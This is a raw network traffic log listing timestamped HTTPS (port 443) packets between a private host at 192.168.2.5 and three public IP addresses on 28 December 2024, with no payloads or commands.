Dec 28, 2024 22:21:27.964148998 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.964214087 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.964221954 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.964267015 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.970010996 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.970048904 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.970130920 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.970139027 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.970184088 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.975215912 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.975231886 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.975292921 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.975301027 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.975352049 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.981167078 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.981189013 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.981246948 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.981254101 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.981292963 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.981312037 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.986963987 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.986980915 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.987056017 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.987061977 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.987102032 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.992481947 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.992497921 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.992572069 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.992578983 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.992621899 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.998416901 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.998433113 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.998495102 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.998502016 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.998543978 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.003631115 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.003648996 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.003724098 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.003731966 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.003772974 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.165198088 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.165222883 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.165308952 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.165318966 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.165361881 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.170006990 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.170062065 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.170074940 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.170082092 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.170114994 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.170133114 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.175199986 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.175218105 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.175283909 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.175290108 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.175329924 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.181416035 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.181436062 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.181540966 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.181570053 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.181621075 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.187005997 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.187022924 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.187098980 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.187105894 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.187151909 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.192670107 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.192702055 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.192756891 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.192764044 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.192800999 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.192820072 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.198637009 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.198656082 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.198729992 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.198740959 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.198784113 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.203670979 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.203691006 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.203762054 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.203773975 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.203816891 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.365583897 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.365602970 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.365678072 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.365690947 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.365737915 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.371285915 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.371305943 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.371392012 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.371398926 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.371449947 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.377248049 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.377264023 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.377338886 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.377346039 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.377389908 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.382422924 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.382441998 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.382503986 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.382510900 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.382539988 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.382554054 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.388228893 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.388246059 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.388302088 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.388308048 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.388349056 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.393876076 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.393892050 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.393951893 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.393956900 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.394002914 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.399682999 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.399719000 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.399804115 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.399808884 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.399852037 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.403165102 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.403211117 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.403234959 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.403240919 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.403285027 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.565690041 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.565716982 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.565817118 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.565834045 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.565886974 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.570415020 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.570430994 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.570617914 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.570622921 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.570684910 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.576319933 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.576356888 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.576428890 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.576435089 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.576478958 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.582247019 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.582264900 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.582339048 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.582345009 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.582391024 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.587466955 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.587483883 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.587637901 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.587642908 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.587737083 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.593413115 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.593427896 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.593545914 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.593552113 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.593641043 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.598874092 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.598890066 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.598984957 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.598990917 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.599035978 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.604657888 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.604675055 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.604757071 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.604763985 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.604806900 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.604867935 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.732789993 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.766818047 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.766829967 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.766890049 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.766932011 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.766936064 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.766957045 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.766990900 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.767040014 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.772121906 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.772139072 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.772212029 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.772217989 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.772263050 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.777338028 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.777354002 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.777421951 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.777429104 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.777475119 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.783230066 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.783246994 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.783365011 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.783370972 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.783458948 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.789042950 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.789061069 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.789196968 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.789202929 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.789297104 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.794986010 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.795001984 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.795109034 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.795115948 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.795198917 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.800518990 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.800534964 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.800648928 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.800654888 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.800749063 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.802979946 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.803050041 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:28.803081036 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.803173065 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.803365946 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:28.803378105 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:29.357446909 CET	49873	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:29.357501030 CET	443	49873	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:29.357564926 CET	49873	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:29.358036995 CET	49873	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:29.358057022 CET	443	49873	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:31.158171892 CET	443	49873	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:31.158289909 CET	49873	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:31.159967899 CET	49873	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:31.159979105 CET	443	49873	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:31.160207033 CET	443	49873	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:31.161449909 CET	49873	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:31.203335047 CET	443	49873	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:32.385273933 CET	443	49873	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:32.385345936 CET	443	49873	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:32.385397911 CET	49873	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:32.385430098 CET	443	49873	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:32.385478973 CET	49873	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:32.848315001 CET	443	49873	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:32.848347902 CET	443	49873	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:32.848392010 CET	443	49873	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:32.848428011 CET	49873	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:32.848486900 CET	443	49873	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:32.848520041 CET	49873	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:32.848546982 CET	49873	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:32.994555950 CET	443	49873	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:32.994612932 CET	443	49873	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:32.994646072 CET	49873	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:32.994663954 CET	443	49873	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:32.994687080 CET	49873	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:32.994715929 CET	49873	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:32.994777918 CET	443	49873	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:32.994832993 CET	49873	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:32.995337963 CET	49873	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:32.995361090 CET	443	49873	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:32.995369911 CET	49873	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:32.995376110 CET	443	49873	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:34.891221046 CET	49887	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:34.891258955 CET	443	49887	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:34.891335964 CET	49887	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:34.892427921 CET	49887	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:34.892440081 CET	443	49887	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:36.603435040 CET	443	49887	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:36.603537083 CET	49887	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:36.606125116 CET	49887	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:36.606128931 CET	443	49887	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:36.606359005 CET	443	49887	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:36.609239101 CET	49887	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:36.609270096 CET	49887	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:36.609272957 CET	443	49887	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:37.577939034 CET	443	49887	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:37.578053951 CET	443	49887	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:37.578109026 CET	49887	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:37.578385115 CET	49887	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:37.578397036 CET	443	49887	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:37.578408003 CET	49887	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:37.578413010 CET	443	49887	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:37.820851088 CET	49896	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:37.820940018 CET	443	49896	3.165.135.3	192.168.2.5
Dec 28, 2024 22:21:37.821033955 CET	49896	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:37.821458101 CET	49896	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:37.821491003 CET	443	49896	3.165.135.3	192.168.2.5
Dec 28, 2024 22:21:39.438813925 CET	443	49896	3.165.135.3	192.168.2.5
Dec 28, 2024 22:21:39.438945055 CET	49896	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:39.440080881 CET	49896	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:39.440103054 CET	443	49896	3.165.135.3	192.168.2.5
Dec 28, 2024 22:21:39.440346956 CET	443	49896	3.165.135.3	192.168.2.5
Dec 28, 2024 22:21:39.441551924 CET	49896	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:39.441606998 CET	49896	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:39.441617012 CET	443	49896	3.165.135.3	192.168.2.5
Dec 28, 2024 22:21:40.243499041 CET	443	49896	3.165.135.3	192.168.2.5
Dec 28, 2024 22:21:40.243582010 CET	443	49896	3.165.135.3	192.168.2.5
Dec 28, 2024 22:21:40.243658066 CET	49896	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:40.243658066 CET	49896	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:40.243741989 CET	49896	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:40.243782997 CET	443	49896	3.165.135.3	192.168.2.5
Dec 28, 2024 22:21:40.962622881 CET	49903	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:40.962656021 CET	443	49903	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:40.962723017 CET	49903	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:40.963010073 CET	49903	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:40.963021040 CET	443	49903	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:42.671935081 CET	443	49903	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:42.672007084 CET	49903	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:42.673273087 CET	49903	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:42.673285007 CET	443	49903	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:42.673532009 CET	443	49903	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:42.674874067 CET	49903	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:42.674890041 CET	49903	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:42.674896955 CET	443	49903	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:43.681819916 CET	443	49903	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:43.681906939 CET	443	49903	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:43.681978941 CET	49903	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:43.682234049 CET	49903	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:43.682251930 CET	443	49903	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:43.682264090 CET	49903	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:43.682269096 CET	443	49903	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:43.683743954 CET	49911	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:43.683801889 CET	443	49911	3.165.135.3	192.168.2.5
Dec 28, 2024 22:21:43.683877945 CET	49911	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:43.684189081 CET	49911	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:43.684201956 CET	443	49911	3.165.135.3	192.168.2.5
Dec 28, 2024 22:21:45.353450060 CET	443	49911	3.165.135.3	192.168.2.5
Dec 28, 2024 22:21:45.353519917 CET	49911	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:45.354760885 CET	49911	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:45.354772091 CET	443	49911	3.165.135.3	192.168.2.5
Dec 28, 2024 22:21:45.355010033 CET	443	49911	3.165.135.3	192.168.2.5
Dec 28, 2024 22:21:45.356241941 CET	49911	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:45.356271029 CET	49911	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:45.356276035 CET	443	49911	3.165.135.3	192.168.2.5
Dec 28, 2024 22:21:46.159955025 CET	443	49911	3.165.135.3	192.168.2.5
Dec 28, 2024 22:21:46.160039902 CET	443	49911	3.165.135.3	192.168.2.5
Dec 28, 2024 22:21:46.160120964 CET	49911	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:46.160185099 CET	443	49911	3.165.135.3	192.168.2.5
Dec 28, 2024 22:21:46.160218000 CET	49911	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:46.160226107 CET	443	49911	3.165.135.3	192.168.2.5
Dec 28, 2024 22:21:46.196141958 CET	49919	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:46.196196079 CET	443	49919	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:46.197144985 CET	49919	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:46.197468996 CET	49919	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:46.197483063 CET	443	49919	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:46.829490900 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:46.829533100 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:46.829607964 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:46.845679045 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:46.845693111 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:47.479090929 CET	49919	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:47.840818882 CET	49921	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:47.840878963 CET	443	49921	3.165.135.3	192.168.2.5
Dec 28, 2024 22:21:47.840955973 CET	49921	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:47.841401100 CET	49921	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:47.841447115 CET	443	49921	3.165.135.3	192.168.2.5
Dec 28, 2024 22:21:48.647038937 CET	443	49920	18.66.161.123	192.168.2.5
